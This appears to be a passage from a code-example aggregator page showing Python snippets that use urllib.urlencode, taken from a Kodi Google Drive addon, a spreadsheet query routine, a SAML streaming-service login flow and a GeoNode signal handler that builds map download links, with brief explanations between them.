                                thumbnailImage=package.file.thumbnail)

        # audio file, not in "pictures"
        if package.file.type == package.file.AUDIO and contextType != 'image':
            if package.file.hasMeta:
                infolabels = decode_dict({ 'title' : package.file.displayTrackTitle(), 'tracknumber' : package.file.trackNumber, 'artist': package.file.artist, 'album': package.file.album,'genre': package.file.genre,'premiered': package.file.releaseDate, 'size' : package.file.size })
            else:
                infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'size' : package.file.size })
            listitem.setInfo('Music', infolabels)
            playbackURL = '?mode=audio'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')

        # encrypted file, viewing in "pictures", assume image
        elif package.file.type == package.file.UNKNOWN and contextType == 'image':
            infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot })
            listitem.setInfo('Pictures', infolabels)
            playbackURL = '?mode=photo'
            listitem.setProperty('IsPlayable', 'false')

        # encrypted file, viewing in "video", assume video
        elif package.file.type == package.file.UNKNOWN and contextType == 'video':
            infolabels = decode_dict({ 'title' : package.file.displayTitle() ,  'plot' : package.file.plot, 'size' : package.file.size })
            listitem.setInfo('Video', infolabels)
            playbackURL = '?mode=video'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')
            if float(package.file.resume) > 0:
                listitem.setProperty('isResumable', '1')  # property values must be strings



        # encrypted file, viewing in "music", assume audio
        elif package.file.type == package.file.UNKNOWN and contextType == 'audio':
            if package.file.hasMeta:
                infolabels = decode_dict({ 'title' : package.file.displayTrackTitle(), 'tracknumber' : package.file.trackNumber, 'artist': package.file.artist, 'album': package.file.album,'genre': package.file.genre,'premiered': package.file.releaseDate, 'size' : package.file.size })
            else:
                infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'size' : package.file.size })
            listitem.setInfo('Music', infolabels)
            playbackURL = '?mode=audio'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')

        # audio file, viewing in "pictures"
        elif package.file.type == package.file.AUDIO and contextType == 'image':
            if package.file.hasMeta:
                infolabels = decode_dict({ 'title' : package.file.displayTrackTitle(), 'tracknumber' : package.file.trackNumber, 'artist': package.file.artist, 'album': package.file.album,'genre': package.file.genre,'premiered': package.file.releaseDate, 'size' : package.file.size })
            else:
                infolabels = decode_dict({ 'title' : package.file.displayTitle(), 'size' : package.file.size })
            listitem.setInfo('Music', infolabels)
            playbackURL = '?mode=audio'
            listitem.setProperty('IsPlayable', 'false')

        # video file
        elif package.file.type == package.file.VIDEO:
            if package.file.hasMeta:
                infolabels = decode_dict({ 'title' : package.file.displayShowTitle() ,  'plot' : package.file.plot, 'TVShowTitle': package.file.show, 'EpisodeName': package.file.showtitle, 'season': package.file.season, 'episode': package.file.episode,'size' : package.file.size })
            else:
                infolabels = decode_dict({ 'title' : package.file.displayTitle() ,  'plot' : package.file.plot, 'size' : package.file.size })
            listitem.setInfo('Video', infolabels)
            playbackURL = '?mode=video'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')
            if float(package.file.resume) > 0:
                listitem.setProperty('isResumable', "1")
            if int(package.file.playcount) > 0: #or (float(package.file.resume) > 0 and package.file.duration > 0 and package.file.resume/package.file.duration > (1-self.settskipResume)):
                listitem.setInfo('video', {'playcount':int(package.file.playcount)})

            if int(package.file.resolution[0]) > 0:
                listitem.addStreamInfo('video', {'width': package.file.resolution[1], 'height': package.file.resolution[0], 'duration':package.file.duration})

        # image file
        elif package.file.type == package.file.PICTURE:
            infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot })
            listitem.setInfo('Pictures', infolabels)
            playbackURL = '?mode=photo'
            listitem.setProperty('IsPlayable', 'false')

        # otherwise, assume video
        else:
            infolabels = decode_dict({ 'title' : package.file.displayTitle() , 'plot' : package.file.plot, 'size' : package.file.size })
            listitem.setInfo('Video', infolabels)
            playbackURL = '?mode=video'
            if self.integratedPlayer:
                listitem.setProperty('IsPlayable', 'false')
            else:
                listitem.setProperty('IsPlayable', 'true')
            if float(package.file.resume) > 0:
                listitem.setProperty('isResumable', '1')

        listitem.setProperty('fanart_image', package.file.fanart)


        cm=[]

        try:
            url = package.getMediaURL()
            cleanURL = re.sub('---', '', url)
            cleanURL = re.sub('&', '---', cleanURL)
        except:
            cleanURL = ''

    #    url = PLUGIN_URL+playbackURL+'&title='+package.file.title+'&filename='+package.file.id+'&instance='+str(self.instanceName)+'&folder='+str(package.folder.id)
        if encfs:
            values = {'instance': self.instanceName, 'dpath': dpath, 'epath': epath, 'encfs': 'true', 'title': package.file.title, 'filename': package.file.id, 'folder': package.folder.id}
        else:
            values = {'instance': self.instanceName, 'title': package.file.title, 'filename': package.file.id, 'folder': package.folder.id}
        url = self.PLUGIN_URL+ str(playbackURL)+ '&' + urllib.urlencode(values)

        if (contextType != 'image' and package.file.type != package.file.PICTURE):
            valuesBS = {'username': self.authorization.username, 'title': package.file.title, 'filename': package.file.id, 'content_type': 'video'}
            cm.append(( self.addon.getLocalizedString(30042), 'XBMC.RunPlugin('+self.PLUGIN_URL+'?mode=buildstrm&type='+str(package.file.type)+'&'+urllib.urlencode(valuesBS)+')', ))

            if (self.protocol == 2):
                # play-original for video only
                if (contextType == 'video'):
                    if self.settings.promptQuality:
                        cm.append(( self.addon.getLocalizedString(30123), 'XBMC.RunPlugin('+url + '&original=true'+')', ))
                    else:
                        cm.append(( self.addon.getLocalizedString(30151), 'XBMC.RunPlugin('+url + '&promptquality=true'+')', ))

                    # if the options are disabled in settings, display option to playback with feature
                    if not self.settings.srt:
                        cm.append(( self.addon.getLocalizedString(30138), 'XBMC.RunPlugin('+url + '&srt=true'+')', ))
                    if not self.settings.cc:
                        cm.append(( self.addon.getLocalizedString(30146), 'XBMC.RunPlugin('+url + '&cc=true'+')', ))

                    cm.append(( self.addon.getLocalizedString(30147), 'XBMC.RunPlugin('+url + '&seek=true'+')', ))
#                    cm.append(( self.addon.getLocalizedString(30148), 'XBMC.RunPlugin('+url + '&resume=true'+')', ))
#                    values = {'instance': self.instanceName, 'folder': package.folder.id}
#                    folderurl = self.PLUGIN_URL+ str(playbackURL)+ '&' + urllib.urlencode(values)
#                    cm.append(( 'folder', 'XBMC.RunPlugin('+folderurl+')', ))

                if contextType != 'image':
                    # download
                    cm.append(( self.addon.getLocalizedString(30113), 'XBMC.RunPlugin('+url + '&download=true'+')', ))

                    # download + watch
                    cm.append(( self.addon.getLocalizedString(30124), 'XBMC.RunPlugin('+url + '&play=true&download=true'+')', ))

#                    # watch downloaded copy
#                    cm.append(( self.addon.getLocalizedString(30125), 'XBMC.RunPlugin('+url + '&cache=true'+')', ))


        elif package.file.type ==  package.file.PICTURE: #contextType == 'image':

                cm.append(( self.addon.getLocalizedString(30126), 'XBMC.RunPlugin('+self.PLUGIN_URL+ '?mode=slideshow&' + urllib.urlencode(values)+')', ))

        #encfs
#        if (self.protocol == 2):
#            cm.append(( self.addon.getLocalizedString(30130), 'XBMC.RunPlugin('+self.PLUGIN_URL+ '?mode=downloadfolder&encfs=true&' + urllib.urlencode(values)+'&content_type='+contextType+')', ))


        url = url + '&content_type='+contextType

        #    listitem.addContextMenuItems( commands )
        #    if cm:
        if  package.file.type ==  package.file.PICTURE: #contextType == 'image':
            listitem.addContextMenuItems(cm, True)
        else:
            listitem.addContextMenuItems(cm, False)

        xbmcplugin.addDirectoryItem(plugin_handle, url, listitem,
                                isFolder=False, totalItems=0)
        return url
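
The playback and context-menu URLs above all follow the same pattern: the addon's plugin:// base, a mode selector, then urlencode for the remaining arguments, which Kodi hands back to the addon when the item is activated. A minimal sketch with a placeholder plugin id:

import urllib

PLUGIN_URL = 'plugin://plugin.video.example/'        # placeholder addon id
values = {'instance': 'gdrive1', 'title': 'My Video',
          'filename': 'abc123', 'folder': 'root'}

url = PLUGIN_URL + '?mode=video&' + urllib.urlencode(values)
# e.g. 'plugin://plugin.video.example/?mode=video&title=My+Video&filename=abc123&...'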

Example 8

Project: GDrive-for-KODI
Source File: gSpreadsheets.py
    def updateMediaPackage(self,url, package1=None, criteria=''):

        if package1 is not None and (package1.file is None or package1.file.id is None) and package1.folder is not None and package1.folder.id is not None:
            params = urllib.urlencode({'folderid':  package1.folder.id})
        elif package1 is not None and (package1.file is None or package1.file.id is not None) and package1.folder is not None and package1.folder.id is not None and  package1.folder.id != '' :
            params = str(urllib.urlencode({'folderid':  package1.folder.id})) +'%20or%20'+ str(urllib.urlencode({'fileid':  package1.file.id}))
        elif package1 is not None and package1.file is not None and package1.file.id is not None:
            params = urllib.urlencode({'fileid':  package1.file.id})
        elif package1 is None and criteria == 'library':
            params = 'foldername!=""&orderby=column:folderid'
        elif package1 is None and criteria == 'queued':
            params = 'folderid=QUEUED&orderby=column:order'
        elif package1 is None and criteria == 'recentwatched':
            from datetime import date, timedelta
            updated = str((date.today() - timedelta(1)).strftime("%Y%m%d%H%M"))
            params = 'folderid!=QUEUED%20and%20watched!=""%20and%20watched>0%20and%20updated>='+updated
        elif package1 is None and criteria == 'recentstarted':
            from datetime import date, timedelta
            updated = str((date.today() - timedelta(1)).strftime("%Y%m%d%H%M"))
            params = 'folderid!=QUEUED%20and%20watched=""%20and%20resume>0%20and%20updated>='+updated
        else:
            return
        url = url + '?sq=' + params
       #url = url + '?tq=' + params


        mediaList = []
        while True:
            req = urllib2.Request(url, None, self.service.getHeadersList())

            try:
                response = urllib2.urlopen(req)
            except urllib2.URLError, e:
              if e.code == 403 or e.code == 401:
                self.service.refreshToken()
                req = urllib2.Request(url, None, self.service.getHeadersList())
                try:
                    response = urllib2.urlopen(req)
                except urllib2.URLError, e:
                    xbmc.log(self.addon.getAddonInfo('name') + ': ' + str(e), xbmc.LOGERROR)
                    return
              else:
                xbmc.log(self.addon.getAddonInfo('name') + ': ' + str(e), xbmc.LOGERROR)
                return

            response_data = response.read()

            previous = ''
            append = True
#            for r in re.finditer('<gsx:folderid>([^<]*)</gsx:folderid><gsx:foldername>([^<]*)</gsx:foldername><gsx:fileid>([^<]*)</gsx:fileid><gsx:filename>([^<]*)</gsx:filename><gsx:nfo>([^<]*)</gsx:nfo><gsx:order>([^<]*)</gsx:order><gsx:watched>([^<]*)</gsx:watched><gsx:resume>([^<]*)</gsx:resume>' ,
            for r in re.finditer('<entry>(.*?)</entry>' ,
                             response_data, re.DOTALL):

                #media = r.groups()
                entry = r.group()
                #exp = re.compile('<gsx:([^\>]+)>(.*)</gsx')
                #exp = re.compile('<gsx:([^\>]+)>([^<]+)</')
                exp = re.compile('<gsx:([^\>]+)>([^<]+)</gsx')
                if package1 is None:
                    newPackage = package.package( file.file('', '', '', self.service.MEDIA_TYPE_VIDEO, '',''),folder.folder('',''))
                else:
                    newPackage = package1


                for media in exp.finditer(entry):
                    # not a general folder ID but another file ID
                    if media.group(1) == 'fileid' and newPackage.file.id != '' and newPackage.file.id != media.group(2) and media.group(2) != '':
                        break
                    elif media.group(1) == 'folderid':
                        newPackage.folder.id = media.group(2)
                    elif media.group(1) == 'foldername':
                        newPackage.folder.title = media.group(2)
                        newPackage.folder.displaytitle = media.group(2)

                        if  criteria == 'library':
                            newPackage.file = None
                            if previous == newPackage.folder.id:
                                append = False
                            else:
                                append = True
                                previous = newPackage.folder.id
                            break

                    elif media.group(1) == 'watched':
                        if  media.group(2) == '':
                            newPackage.file.playcount = 0
                        else:
                            newPackage.file.playcount =  media.group(2)

                    elif media.group(1) == 'resume':
                        if  media.group(2) == '':
                            newPackage.file.resume = 0
                        else:
                            newPackage.file.resume = media.group(2)
                    elif media.group(1) == 'commands':
                        newPackage.file.commands = media.group(2)
                    elif media.group(1) == 'nfo':
                        nfoInfo = media.group(2)
                        nfoInfo = re.sub('&lt;', '<', nfoInfo)
                        nfoInfo = re.sub('/\s?&gt;', '> </>', nfoInfo)
                        nfoInfo = re.sub('&gt;', '>', nfoInfo)
                        nfo = re.compile('<([^\>]+)>([^\<]*)</')
                        for info in nfo.finditer(nfoInfo):
                            if info.group(1) == 'title':
                                newPackage.file.title = info.group(2)
                            elif info.group(1) == 'premiered' or info.group(1) == 'year':
                                newPackage.file.date = info.group(2)
                            elif info.group(1) == 'plot' or info.group(1) == 'description':
                                newPackage.file.plot = info.group(2)
                            elif info.group(1) == 'actors':
                                newPackage.file.cast = info.group(2)
                    elif media.group(1) == 'fanart':
                        newPackage.file.fanart = self.service.API_URL +'files/' + str(media.group(2)) + '?alt=media' + '|' + self.service.getHeadersEncoded()

                    elif media.group(1) == 'fileid':
                        newPackage.file.id = media.group(2)
                    elif media.group(1) == 'filename':
                        newPackage.file.title = media.group(2)

                if append:
                    mediaList.append(newPackage)
            nextURL = ''
            for r in re.finditer('<link rel=\'next\' type=\'[^\']+\' href=\'([^\']+)\'' ,
                             response_data, re.DOTALL):
                nextURL = r.groups()

            response.close()

            if nextURL == '':
                break
            else:
                url = nextURL[0]


        return mediaList
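
The structured-query branches above join two urlencoded clauses with a separator that is already percent-encoded ('%20or%20'); passing the whole expression through urlencode instead would escape the '%' signs a second time. A minimal sketch of that assembly with placeholder ids and a placeholder feed URL:

import urllib

folder_clause = urllib.urlencode({'folderid': 'FOLDER123'})   # 'folderid=FOLDER123'
file_clause = urllib.urlencode({'fileid': 'FILE456'})         # 'fileid=FILE456'

# Join with a pre-encoded ' or ' so the '%' characters are not escaped again.
sq = folder_clause + '%20or%20' + file_clause
url = 'https://spreadsheets.google.com/feeds/list/KEY/od6/private/full' + '?sq=' + sq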

Example 9

    def LOGIN(self, saml_request, relay_state, saml_submit_url):
        ###################################################################
        #Post SAML Request & Relay State to get requestId
        ###################################################################       

        url = 'https://adobe.auth-gateway.net/saml/saml2/idp/SSOService.php'

        #cj = cookielib.LWPCookieJar()
        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),
                            ("Origin", "https://sp.auth.adobe.com"),
                            ("Referer", IDP_URL),
                            ("User-Agent", UA_IPHONE)]

        
        data = urllib.urlencode({'SAMLRequest' : saml_request,
                                   'RelayState' : relay_state
                                   })
        
        
        resp = opener.open(url, data)
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()
        last_url = resp.geturl()
        idp_source = resp.read()
        resp.close()
        SAVE_COOKIE(cj)        
        

        #cj = cookielib.LWPCookieJar()
        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),
                            ("Origin", "https://sp.auth.adobe.com"),
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]

        


        
        resp = opener.open(last_url+"&history=1")
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()
        last_url = resp.geturl()
        idp_source = resp.read()
        resp.close()
        SAVE_COOKIE(cj)  



        #######################################################
        # firstbookend
        #######################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]

        
        resp = opener.open(last_url+"&history=1")
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()
        idp_source = resp.read()
        resp.close()
        SAVE_COOKIE(cj) 

     

        #request_id = FIND(idp_source,'<input type="hidden" name="requestId" value="','"')
        params = FIND(idp_source,'<input id="brandingParams" type="hidden" name="params" value="','"')



    
        ###################################################################
        #Post username and password       
        ###################################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)

        url = 'https://auth.api.sonyentertainmentnetwork.com/login.do'        
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),
                            ("Origin", "https://auth.api.sonyentertainmentnetwork.com"),
                            ("Referer", "https://auth.api.sonyentertainmentnetwork.com/login.jsp?service_entity=psn&mid=nbcsports&request_theme=liquid"),
                            ("User-Agent", UA_IPHONE)]

        
        login_data = urllib.urlencode({'params' : params,
                                       'j_username' : USERNAME,
                                       'j_password' : PASSWORD
                                     })
        
        #try:
        resp = opener.open(url, login_data)
        print resp.getcode()
        print resp.info()
        idp_source = resp.read()            
        resp.close()
        SAVE_COOKIE(cj) 

        url = FIND(idp_source,'<meta http-equiv="refresh" content="0;url=','"')

        #######################################################
        # sony DiscoveryAssociationsResume
        #######################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]

        
        resp = opener.open(url)
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 


        #######################################################
        # sony lastbookend
        #######################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]
        

        resp = opener.open(last_url+"&history=3")
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()            
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 

        saml_response = FIND(idp_source,'<input type="hidden" name="SAMLResponse" value="','"') 
        saml_response = HTMLParser.HTMLParser().unescape(saml_response)        
        url = FIND(idp_source,'<form method="post" action="','"')
       
        #except:
        #saml_response = ""
        #relay_state = ""

        #######################################################
        # adobe saml module.php
        #######################################################
        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]
        

        data = urllib.urlencode({'SAMLResponse' : saml_response})

        resp = opener.open(url,data)
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()            
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 



        url = FIND(idp_source,'<meta http-equiv="refresh" content="0;url=','"')

        #######################################################
        # adobe DiscoveryAssociationsResume
        #######################################################
        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]
        

        resp = opener.open(url)        
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 


        #######################################################
        # adobe lastbookend
        #######################################################

        cj = cookielib.LWPCookieJar(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'))
        cj.load(os.path.join(ADDON_PATH_PROFILE, 'cookies.lwp'),ignore_discard=True)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))    
        opener.addheaders = [ ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
                            ("Accept-Encoding", "deflate"),
                            ("Accept-Language", "en-us"),
                            ("Content-Type", "application/x-www-form-urlencoded"),                            
                            ("Connection", "keep-alive"),                            
                            ("Referer", last_url),
                            ("User-Agent", UA_IPHONE)]
        

        resp = opener.open(last_url+"&history=4")
        print resp.getcode()
        print resp.info()
        print "URL"
        print resp.geturl()            
        idp_source = resp.read()
        last_url = resp.geturl()
        resp.close()
        SAVE_COOKIE(cj) 


        saml_response = FIND(idp_source,'<input type="hidden" name="SAMLResponse" value="','"') 
        saml_response = HTMLParser.HTMLParser().unescape(saml_response)        
        relay_state = FIND(idp_source,'<input type="hidden" name="RelayState" value="','"')
        #Set Global header fields         
        global ORIGIN
        global REFERER

        ORIGIN = 'https://adobe.auth-gateway.net'        
        REFERER = last_url
        print saml_response

        return saml_response, relay_state
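
The login step above boils down to one pattern: form-encode the credential fields with urllib.urlencode and POST them through a cookie-aware urllib2 opener. A minimal, self-contained sketch of that pattern follows; the endpoint, field names and credentials are placeholders, not the real service values.

import cookielib
import urllib
import urllib2

# Placeholder endpoint and credentials, for illustration only.
LOGIN_URL = 'https://example.com/login.do'

cj = cookielib.LWPCookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('Content-Type', 'application/x-www-form-urlencoded'),
                     ('User-Agent', 'Mozilla/5.0')]

# urllib.urlencode turns the dict into something like
# 'j_username=user&j_password=s3cret' (key order is not guaranteed for a dict).
login_data = urllib.urlencode({'j_username': 'user', 'j_password': 's3cret'})

# Passing a data argument makes urllib2 issue a POST instead of a GET.
resp = opener.open(LOGIN_URL, login_data)
print resp.getcode()
resp.close()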

Example 10

Project: geonode
Source File: signals.py
View license
def geoserver_post_save(instance, sender, **kwargs):
    """Save keywords to GeoServer

       The way keywords are implemented requires the layer
       to be saved to the database before accessing them.
    """

    if type(instance) is ResourceBase:
        if hasattr(instance, 'layer'):
            instance = instance.layer
        else:
            return

    if instance.storeType == "remoteStore":
        # Save layer attributes
        set_attributes_from_geoserver(instance)
        return

    if not getattr(instance, 'gs_resource', None):
        try:
            gs_resource = gs_catalog.get_resource(
                instance.name,
                store=instance.store,
                workspace=instance.workspace)
        except socket_error as serr:
            if serr.errno != errno.ECONNREFUSED:
                # Not the error we are looking for, re-raise
                raise serr
            # If the connection is refused, take it easy.
            return
    else:
        gs_resource = instance.gs_resource

    if gs_resource is None:
        return

    if settings.RESOURCE_PUBLISHING:
        if instance.is_published != gs_resource.advertised:
            if getattr(ogc_server_settings, "BACKEND_WRITE_ENABLED", True):
                gs_resource.advertised = instance.is_published
                gs_catalog.save(gs_resource)

    if any(instance.keyword_list()):
        gs_resource.keywords = instance.keyword_list()
        # gs_resource should only be called if
        # ogc_server_settings.BACKEND_WRITE_ENABLED == True
        if getattr(ogc_server_settings, "BACKEND_WRITE_ENABLED", True):
            gs_catalog.save(gs_resource)

    bbox = gs_resource.latlon_bbox
    dx = float(bbox[1]) - float(bbox[0])
    dy = float(bbox[3]) - float(bbox[2])

    dataAspect = 1 if dy == 0 else dx / dy

    height = 550
    width = int(height * dataAspect)

    # Set download links for WMS, WCS or WFS and KML
    links = wms_links(ogc_server_settings.public_url + 'wms?',
                      instance.typename.encode('utf-8'), instance.bbox_string,
                      instance.srid, height, width)

    for ext, name, mime, wms_url in links:
        Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                   name=ugettext(name),
                                   defaults=dict(
                                       extension=ext,
                                       url=wms_url,
                                       mime=mime,
                                       link_type='image',
                                   )
                                   )

    if instance.storeType == "dataStore":
        links = wfs_links(
            ogc_server_settings.public_url +
            'wfs?',
            instance.typename.encode('utf-8'))
        for ext, name, mime, wfs_url in links:
            if mime == 'SHAPE-ZIP':
                name = 'Zipped Shapefile'
            Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                       url=wfs_url,
                                       defaults=dict(
                                           extension=ext,
                                           name=name,
                                           mime=mime,
                                           url=wfs_url,
                                           link_type='data',
                                       )
                                       )

        gs_store_type = gs_resource.store.type.lower() if gs_resource.store.type else None
        geogig_repository = gs_resource.store.connection_parameters.get('geogig_repository', '')
        geogig_repo_name = geogig_repository.replace('geoserver://', '')

        if gs_store_type == 'geogig' and geogig_repo_name:

            repo_url = '{url}geogig/repos/{repo_name}'.format(
                url=ogc_server_settings.public_url,
                repo_name=geogig_repo_name)

            path = gs_resource.dom.findall('nativeName')

            if path:
                path = 'path={path}'.format(path=path[0].text)

            Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                       url=repo_url,
                                       defaults=dict(extension='html',
                                                     name='Clone in GeoGig',
                                                     mime='text/xml',
                                                     link_type='html'
                                                     )
                                       )

            def command_url(command):
                return "{repo_url}/{command}.json?{path}".format(repo_url=repo_url,
                                                                 path=path,
                                                                 command=command)

            Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                       url=command_url('log'),
                                       defaults=dict(extension='json',
                                                     name='GeoGig log',
                                                     mime='application/json',
                                                     link_type='html'
                                                     )
                                       )

            Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                       url=command_url('statistics'),
                                       defaults=dict(extension='json',
                                                     name='GeoGig statistics',
                                                     mime='application/json',
                                                     link_type='html'
                                                     )
                                       )

    elif instance.storeType == 'coverageStore':

        links = wcs_links(ogc_server_settings.public_url + 'wcs?',
                          instance.typename.encode('utf-8'))

    for ext, name, mime, wcs_url in links:
        Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                                   url=wcs_url,
                                   defaults=dict(
                                       extension=ext,
                                       name=name,
                                       mime=mime,
                                       link_type='data',
                                   )
                                   )

    kml_reflector_link_download = ogc_server_settings.public_url + "wms/kml?" + \
        urllib.urlencode({'layers': instance.typename.encode('utf-8'), 'mode': "download"})

    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=kml_reflector_link_download,
                               defaults=dict(
                                   extension='kml',
                                   name="KML",
                                   mime='text/xml',
                                   link_type='data',
                               )
                               )

    kml_reflector_link_view = ogc_server_settings.public_url + "wms/kml?" + \
        urllib.urlencode({'layers': instance.typename.encode('utf-8'), 'mode': "refresh"})

    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=kml_reflector_link_view,
                               defaults=dict(
                                   extension='kml',
                                   name="View in Google Earth",
                                   mime='text/xml',
                                   link_type='data',
                               )
                               )

    html_link_url = '%s%s' % (
        settings.SITEURL[:-1], instance.get_absolute_url())

    Link.objects.get_or_create(resource=instance.resourcebase_ptr,
                               url=html_link_url,
                               defaults=dict(
                                   extension='html',
                                   name=instance.typename,
                                   mime='text/html',
                                   link_type='html',
                               )
                               )

    params = {
        'layers': instance.typename.encode('utf-8'),
        'format': 'image/png8',
        'width': 200,
        'height': 150,
        'TIME': '-99999999999-01-01T00:00:00.0Z/99999999999-01-01T00:00:00.0Z'

    }

    # Avoid using urllib.urlencode here because it breaks the URL:
    # commas and slashes in the values get percent-encoded and then cause
    # trouble with the WMS parser.
    p = "&".join("%s=%s" % item for item in params.items())

    thumbnail_remote_url = ogc_server_settings.PUBLIC_LOCATION + \
        "wms/reflect?" + p

    thumbnail_create_url = ogc_server_settings.LOCATION + \
        "wms/reflect?" + p

    create_thumbnail(instance, thumbnail_remote_url, thumbnail_create_url, ogc_client=http_client)

    legend_url = ogc_server_settings.PUBLIC_LOCATION + \
        'wms?request=GetLegendGraphic&format=image/png&WIDTH=20&HEIGHT=20&LAYER=' + \
        instance.typename + '&legend_options=fontAntiAliasing:true;fontSize:12;forceLabels:on'

